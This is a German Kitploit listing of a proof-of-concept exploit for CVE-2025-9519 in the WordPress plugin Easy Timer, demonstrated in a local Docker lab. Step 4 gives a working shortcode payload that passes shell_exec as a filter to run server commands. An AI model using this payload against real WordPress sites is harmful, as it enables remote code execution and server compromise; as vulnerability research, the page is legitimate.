Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Poc-CVE-2025-9519 — Proof-of-Concept-Exploit für CVE-2025-9519, das Remote-Code-Ausführung im WordPress-Plugin Easy Timer über einen manipulierten Shortcode-Filter demonstriert, mit Docker-basierter Einrichtung. | Kitploit
Tools/GitHubGitHub/nimisha17/poc-cve-2025-9519
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubnimisha17/poc-cve-2025-9519

Poc-CVE-2025-9519

Proof-of-Concept-Exploit für CVE-2025-9519, das Remote-Code-Ausführung im WordPress-Plugin Easy Timer über einen manipulierten Shortcode-Filter demonstriert, mit Docker-basierter Einrichtung.

Repository anzeigen
21vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Easy Timer v4.2.1 -

Voraussetzungen

  • Docker Engine installiert
  • Docker Compose installiert

Siehe die offizielle Docker-Dokumentation für die Installation: Docker Engine Install

1. WordPress mit Docker starten

Führen Sie aus Ihrem Projektverzeichnis aus:

root@kitploit:~
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress

2. WordPress einrichten

  1. Navigieren Sie zu http://localhost:8000/
  2. Schließen Sie die WordPress-Einrichtung ab
  3. Navigieren Sie zu WordPress-Dashboard → Plugins → und klicken Sie auf .
Easy Timer
Aktivieren
Screenshot from 2025-10-27 12-52-06

3. Neuen Benutzer mit Editor-Berechtigungen hinzufügen

Führen Sie aus Ihrem Projektverzeichnis den folgenden Befehl aus:

root@kitploit:~
docker compose run --rm wpcli user create \
  editoruser [email protected] \
  --role=editor \
  --user_pass=P@ssw0rd!

(Hinweis: Ersetzen Sie dies durch Ihren gewünschten Benutzernamen, Ihre E-Mail-Adresse und Ihr Passwort!)

4. Beitrag erstellen

  1. Gehen Sie zu Beiträge → Neuen Beitrag hinzufügen
  2. Fügen Sie einen Shortcode-Block ein und geben Sie Folgendes ein:
root@kitploit:~
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
  1. Klicken Sie auf Aktualisieren → Beitrag ansehen, um die Ausführung des Timers zu sehen.

⚠️ Hinweis: Stellen Sie sicher, dass Sie einen Shortcode-Block verwenden, keinen Absatz-Block, damit der Shortcode korrekt gerendert wird.

Screenshot from 2025-10-27 13-36-40

Glückwunsch, Sie haben RCE. image

Tipps zur Fehlerbehebung

  • Laufende Container prüfen:
root@kitploit:~
sudo docker ps

Sie sollten in etwa Folgendes sehen:

Screenshot from 2025-10-27 12-51-08
  • Wenn Shortcodes nicht gerendert werden:

    1. Gehen Sie zu Design → Themes
    2. Aktivieren Sie Twenty Twenty-Three (oder ein anderes Standard-Theme).
  • Wenn die Navigation zu http://localhost:8000/ die Meldung Datenbank nicht verbunden anzeigt:

    1. Warten Sie ein oder zwei Minuten, bis die Datenbank die Einrichtung abgeschlossen hat.
Tool herunterladen